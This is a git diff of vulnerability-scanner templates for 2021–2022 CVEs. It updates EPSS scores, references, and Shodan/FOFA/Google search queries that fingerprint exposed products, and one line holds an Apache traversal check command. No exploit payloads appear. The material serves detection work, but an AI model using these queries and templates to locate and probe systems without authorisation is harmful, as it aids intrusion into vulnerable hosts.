cwe-id: CWE-22 - epss-score: 0.97391 - epss-percentile: 0.9991 + epss-score: 0.97429 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index ea1cf336da..9338228462 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -21,16 +21,18 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 - epss-score: 0.00418 - epss-percentile: 0.73669 + epss-score: 0.00425 + epss-percentile: 0.7427 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: knowledge_warehouse shodan-query: http.favicon.hash:-266008933 - zoomeye-query: +app:"SAP NetWeaver Application Server httpd fofa-query: icon_hash=-266008933 + zoomeye-query: + - +app:"SAP NetWeaver Application Server httpd + - +app:"sap netweaver application server httpd tags: cve2021,cve,sap,xss,seclists,packetstorm http: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index a4cd97729f..5e1f284cae 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-42192 cwe-id: CWE-863 - epss-score: 0.04146 - epss-percentile: 0.91987 + epss-score: 0.05551 + epss-percentile: 0.93226 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 5527ada552..769afc1ad9 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: sitecore product: experience_platform - shodan-query: http.title:"SiteCore" + shodan-query: + - http.title:"SiteCore" + - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 1dfba3e803..1f0436df87 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -12,13 +12,16 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 - https://www.redguard.ch/advisories/netbiblio_webopac.txt + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/compr00t/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.46641 + epss-percentile: 0.4686 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index f63cd49636..ccde4d0c1f 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: apereo product: central_authentication_service - shodan-query: http.title:'CAS - Central Authentication Service' + shodan-query: + - http.title:'CAS - Central Authentication Service' + - http.title:'cas - central authentication service' fofa-query: title='cas - central authentication service' google-query: intitle:'cas - central authentication service' tags: cve2021,cve,apereo,xss,cas diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 37b867f67e..a3047dce60 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: dlink product: dir-615 - shodan-query: http.title:"Roteador Wireless" + shodan-query: + - http.title:"Roteador Wireless" + - cpe:"cpe:2.3:h:dlink:dir-615" tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink http: diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index aae84cd6d7..79eddea40f 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -15,13 +15,14 @@ info: - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html - https://github.com/TheHackingRabbi/CVE-2021-42663 - https://nvd.nist.gov/vuln/detail/CVE-2021-42663 + - https://github.com/SYRTI/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45174 + epss-percentile: 0.45225 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index e6eb7c04ec..8a8e11843d 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: totolink product: ex1200t_firmware - shodan-query: title:"TOTOLINK" + shodan-query: + - title:"TOTOLINK" + - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve2021,cve,totolink,auth-bypass,router diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 08ffcdc8de..fbba8a614d 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -27,8 +27,10 @@ info: max-request: 1 vendor: fortinet product: fortimail - fofa-query: title="fortimail" shodan-query: http.title:"fortimail" + fofa-query: + - title="fortimail" + - fortimail && port=443 google-query: intitle:"fortimail" tags: cve,cve2021,fortimail,xss,fortinet,edb diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 8df2d6d1e4..eca36652a5 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: thoughtworks product: gocd - shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - fofa-query: title="create a pipeline - go" html:"gocd version" + shodan-query: + - http.title:"Create a pipeline - Go" html:"GoCD Version" + - http.html:"gocd version" + - http.title:"create a pipeline - go" html:"gocd version" + fofa-query: + - title="create a pipeline - go" html:"gocd version" + - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" tags: cve2021,cve,go,lfi,gocd,thoughtworks diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 20a7c40ec6..14cdce307c 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -29,8 +29,13 @@ info: max-request: 3 vendor: atmail product: atmail - shodan-query: http.html:"Powered by Atmail" - fofa-query: body="powered by atmail" + shodan-query: + - http.html:"Powered by Atmail" + - http.html:"powered by atmail" + - http.html:"atmail" + fofa-query: + - body="powered by atmail" + - body="atmail" tags: cve2021,cve,atmail,xss http: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index d3b18de76c..06fa51c27f 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,unauth,spotweb_project diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index aac18356c8..6852c573f6 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve2021,cve,kkfileview,traversal,lfi,keking http: diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index a32006f43a..b975326856 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -27,8 +27,13 @@ info: max-request: 3 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,packetstorm,grafana,lfi diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 608cb87aea..ef3de506fc 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -26,7 +26,10 @@ info: max-request: 2 vendor: caucho product: resin - shodan-query: html:"Resin" + shodan-query: + - html:"Resin" + - http.html:"resin" + - cpe:"cpe:2.3:a:caucho:resin" fofa-query: body="resin" tags: cve2021,cve,resin,caucho,lfi diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 003fad7886..bd2ddb4685 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -17,14 +17,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 - epss-score: 0.01355 - epss-percentile: 0.84732 + epss-score: 0.01303 + epss-percentile: 0.85873 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel - shodan-query: title:"Sentinel Dashboard" + shodan-query: + - title:"Sentinel Dashboard" + - http.title:"sentinel dashboard" fofa-query: title="sentinel dashboard" google-query: intitle:"sentinel dashboard" tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 8db490ca6e..0d2b00e43b 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -29,9 +29,14 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"Reprise License Manager" + shodan-query: + - http.html:"Reprise License Manager" + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" - fofa-query: body="reprise license manager" tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 68ab110e4d..eaaaffbd1f 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -28,8 +28,12 @@ info: max-request: 3 vendor: apache product: superset - shodan-query: http.favicon.hash:1582430156 - fofa-query: body="apache superset" + shodan-query: + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: cve2021,cve,apache,superset,default-login http: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index de935da98c..b44a958333 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -27,7 +27,9 @@ info: vendor: zohocorp product: manageengine_desktop_central shodan-query: http.title:"manageengine desktop central 10" - fofa-query: title="manageengine desktop central 10" + fofa-query: + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 8772a96bbd..2f822a2ac8 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815 - https://www.debian.org/security/2023/dsa-5372 + - https://security.netapp.com/advisory/ntap-20240208-0003/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - epss-score: 0.00087 - epss-percentile: 0.36061 + epss-score: 0.00178 + epss-percentile: 0.54936 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index acf814c089..1049ac9750 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_cloud_services_appliance - shodan-query: title:"LANDesk(R) Cloud Services Appliance" + shodan-query: + - title:"LANDesk(R) Cloud Services Appliance" + - http.title:"landesk(r) cloud services appliance" fofa-query: title="landesk(r) cloud services appliance" google-query: intitle:"landesk(r) cloud services appliance" tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index ac8ea39e8d..212dd1d043 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -27,9 +27,11 @@ info: max-request: 1 vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system - google-query: intitle:"HD-Network Real-time Monitoring System V2.0" shodan-query: http.title:"hd-network real-time monitoring system v2.0" fofa-query: title="hd-network real-time monitoring system v2.0" + google-query: + - intitle:"HD-Network Real-time Monitoring System V2.0" + - intitle:"hd-network real-time monitoring system v2.0" tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project http: diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 9564be3d8b..24385a6024 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: appcms product: appcms - shodan-query: http.html:"Powerd by AppCMS" + shodan-query: + - http.html:"Powerd by AppCMS" + - http.html:"powerd by appcms" fofa-query: body="powerd by appcms" tags: cve2021,cve,appcms,xss diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index cd53d1b650..35cd7a7e17 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"Reprise License" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"Reprise License" + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve2021,cve,reprise,xss,seclists,reprisesoftware diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 2dd29fe805..5470e65105 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46073 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34354 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index da28a64a04..8efddaec54 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: ligeo-archives product: ligeo_basics - shodan-query: title:"Ligeo" - fofa-query: title="Ligeo" + shodan-query: + - title:"Ligeo" + - http.title:"ligeo" + fofa-query: + - title="Ligeo" + - title="ligeo" google-query: intitle:"ligeo" tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index f171757e1b..93fb980545 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware - shodan-query: http.title:"Zywall2Plus" + shodan-query: + - http.title:"Zywall2Plus" + - http.title:"zywall2plus" fofa-query: title="zywall2plus" google-query: intitle:"zywall2plus" tags: cve2021,cve,xss,zyxel,edb diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 450af2d9b2..2258c6bda3 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: franklinfueling product: colibri_firmware - shodan-query: http.html:"Franklin Fueling Systems" + shodan-query: + - http.html:"Franklin Fueling Systems" + - http.html:"franklin fueling systems" fofa-query: body="franklin fueling systems" tags: cve2021,cve,packetstorm,franklinfueling,lfi diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 0631fadd06..4437c0a141 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -19,10 +19,10 @@ info: cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: telesquare - product: tlr-2855ks6 - fofa-query: product=="TELESQUARE-TLR-2855KS6" + product: "tlr-2855ks6" + fofa-query: "product==\"TELESQUARE-TLR-2855KS6\"" tags: packetstorm,cve,cve2021,telesquare,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index 7ad2c0330a..d715dc2e4c 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -19,12 +19,17 @@ info: cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: telesquare - product: tlr-2855ks6_firmware - shodan-query: title:"Login to TLR-2855KS6" - fofa-query: product=="TELESQUARE-TLR-2855KS6" - google-query: intitle:"login to tlr-2855ks6" + product: "tlr-2855ks6_firmware" + shodan-query: + - "title:\"Login to TLR-2855KS6\"" + - http.title:"login to tlr-2855ks6" + fofa-query: + - "product==\"TELESQUARE-TLR-2855KS6\"" + - title="login to tlr-2855ks6" + - product=="telesquare-tlr-2855ks6" + google-query: "intitle:\"login to tlr-2855ks6\"" tags: packetstorm,cve,cve2021,telesquare,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 51307d001c..2b8528f7fc 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: telesquare product: tlr-2005ksh_firmware - shodan-query: http.html:"TLR-2005KSH" + shodan-query: + - http.html:"TLR-2005KSH" + - http.html:"tlr-2005ksh" fofa-query: body="tlr-2005ksh" tags: cve2021,cve,telesquare,intrusive,packetstorm diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 235e91b304..a958d31aec 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: genieacs product: genieacs - shodan-query: http.favicon.hash:-2098066288 - fofa-query: body="genieacs" + shodan-query: + - http.favicon.hash:-2098066288 + - http.html:"genieacs" + fofa-query: + - body="genieacs" + - icon_hash=-2098066288 tags: cve2021,cve,genieacs,rce http: diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 92319bb8f8..84c97ebe05 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -28,9 +28,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress - publicwww-query: "/wp-content/plugins/photo-gallery" shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery + publicwww-query: "/wp-content/plugins/photo-gallery" tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index bd225046da..f903b4b300 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0201 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 03c5cbb12f..20beb4db78 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 - https://nvd.nist.gov/vuln/detail/CVE-2022-0220 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - epss-percentile: 0.46641 + epss-percentile: 0.4686 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 84547bef16..203bb5afb9 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -26,9 +26,9 @@ info: vendor: sygnoos product: popup_builder framework: wordpress - publicwww-query: /wp-content/plugins/popup-builder/ shodan-query: http.html:/wp-content/plugins/popup-builder/ fofa-query: body=/wp-content/plugins/popup-builder/ + publicwww-query: /wp-content/plugins/popup-builder/ tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 84e5d11348..2b78063b5d 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -29,9 +29,9 @@ info: vendor: thimpress product: learnpress framework: wordpress - publicwww-query: /wp-content/plugins/learnpress shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress + publicwww-query: /wp-content/plugins/learnpress tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress http: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index e23858ffff..9906c9614f 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -20,15 +20,19 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 - epss-score: 0.0049 - epss-percentile: 0.73618 + epss-score: 0.00415 + epss-percentile: 0.73978 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,disclosure,huntr http: diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index bb4480858b..767c564c99 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: zyxel product: usg40_firmware - fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" + fofa-query: + - body="/2FA-access.cgi" && body="zyxel zyxel_style1" + - body="/2fa-access.cgi" && body="zyxel zyxel_style1" tags: cve2022,cve,zyxel,auth-bypass,router http: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 69b67c8ec6..f781f8dd17 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 885fbbe07c..9eedff76b0 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -25,12 +25,11 @@ info: epss-percentile: 0.59134 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: embed_swagger_project - product: embed_swagger + max-request: 2 + vendor: "embed_swagger_project" + product: "embed_swagger" framework: wordpress tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index a9ba72f2d9..f76c10feff 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -28,9 +28,11 @@ info: max-request: 6 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 47f531630a..de1d4da9ce 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0424 cwe-id: CWE-306 - epss-score: 0.00082 - epss-percentile: 0.34103 + epss-score: 0.01488 + epss-percentile: 0.86805 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,10 +24,10 @@ info: vendor: supsystic product: popup framework: wordpress - publicwww-query: "/wp-content/plugins/popup-by-supsystic" shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic - tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup + publicwww-query: "/wp-content/plugins/popup-by-supsystic" + tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic http: - raw: diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 91c83ccdaa..dc0db1b43f 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -26,9 +26,9 @@ info: vendor: metaphorcreations product: ditty framework: wordpress - publicwww-query: "/wp-content/plugins/ditty-news-ticker/" shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ fofa-query: body=/wp-content/plugins/ditty-news-ticker/ + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations http: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 477db3d259..1c430c29ef 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -24,10 +24,12 @@ info: epss-percentile: 0.96565 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: atlassian - product: 